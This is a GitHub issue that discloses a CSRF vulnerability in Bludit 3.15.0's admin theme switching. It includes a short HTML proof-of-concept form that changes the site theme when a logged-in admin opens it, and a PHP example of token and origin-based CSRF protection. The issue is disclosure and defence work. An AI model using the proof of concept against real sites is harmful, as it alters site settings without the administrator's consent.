
Cross-Site Request Forgery (CSRF) within the admin theme selection functionality #1566

Open
Nvz0x opened this issue Apr 12, 2024 · 0 comments


Nvz0x commented Apr 12, 2024

Describe your problem

A Cross-Site Request Forgery (CSRF) vulnerability has been identified within the admin theme selection functionality.

Steps to Reproduce:

Crafted a Proof of Concept (PoC) demonstrating a CSRF exploit for selecting the alternative theme.
Example:

```html
<html>
<form enctype="text/plain" method="GET" action="https://localhost/bludit/admin/install-theme/alternative">
    <table>
        <tr>
            <td></td>
            <td><input type="text" value="Change Theme For PoC" name=""></td>
        </tr>
    </table>
    <input type="submit" value="https://localhost/bludit/admin/install-theme/alternative">
</form>
</html>
```

Note: Replace /alternative with /popeye or /blogx to target different themes.

Impact:
When a logged-in admin interacts with the crafted HTML page, the site's theme can be changed without their consent.

Recommendation:
Implement CSRF protection mechanisms to mitigate unauthorized theme changes.

Bludit version

3.15.0

PHP version

PHP Version 8.2.12.
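As an added example (not Bludit's own code and not part of this report), the following PHP shows the kind of CSRF protection the recommendation asks for: the theme change only goes through on a POST carrying a per-session token checked with a constant-time comparison, with an Origin/Referer same-host check as defense in depth. The function names, the `/admin/install-theme` form action and the `csrf_token` field are illustrative assumptions, not Bludit's API.

```php
<?php
// Added example, not Bludit's own code: CSRF protection for a state-changing
// admin action such as activating a theme. Names and paths are illustrative.
// SameSite cookies stop most cross-site submissions before any token check runs.
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true, 'secure' => true]);
session_start();

// Issue one random token per session and reuse it in every admin form.
function csrfToken(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison so the check leaks nothing about the stored token.
function csrfTokenIsValid(?string $submitted): bool {
    return is_string($submitted)
        && !empty($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

// Defense in depth: a same-origin submission names our own host in Origin (or Referer).
function originMatches(string $expectedHost): bool {
    $src = $_SERVER['HTTP_ORIGIN'] ?? $_SERVER['HTTP_REFERER'] ?? '';
    $host = $src === '' ? '' : (string) parse_url($src, PHP_URL_HOST);
    return $host !== '' && strcasecmp($host, $expectedHost) === 0;
}

// Hardened handler: a GET link like the one in the report is rejected outright, and a
// POST succeeds only with a valid token, a matching origin and a known theme name.
function handleThemeChange(array $allowedThemes): void {
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        http_response_code(405);
        exit('Theme changes must be submitted with POST');
    }
    if (!csrfTokenIsValid($_POST['csrf_token'] ?? null) || !originMatches($_SERVER['SERVER_NAME'])) {
        http_response_code(403);
        exit('CSRF check failed');
    }
    $theme = $_POST['theme'] ?? '';
    if (!in_array($theme, $allowedThemes, true)) {
        http_response_code(400);
        exit('Unknown theme');
    }
    // Activate $theme here; the request has passed every check above.
}

// Rendering side: the hidden token ties the form to this session, so a third-party page cannot forge it.
echo '<form method="POST" action="/admin/install-theme">'
   . '<input type="hidden" name="csrf_token" value="' . htmlspecialchars(csrfToken(), ENT_QUOTES) . '">'
   . '<select name="theme"><option>alternative</option></select><button type="submit">Activate</button></form>';
```

Because state changes are only accepted via POST, a GET to the install-theme path from a foreign page (the vector described above) fails before any token is even inspected, and such attempts show up in the access log as 405 responses.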
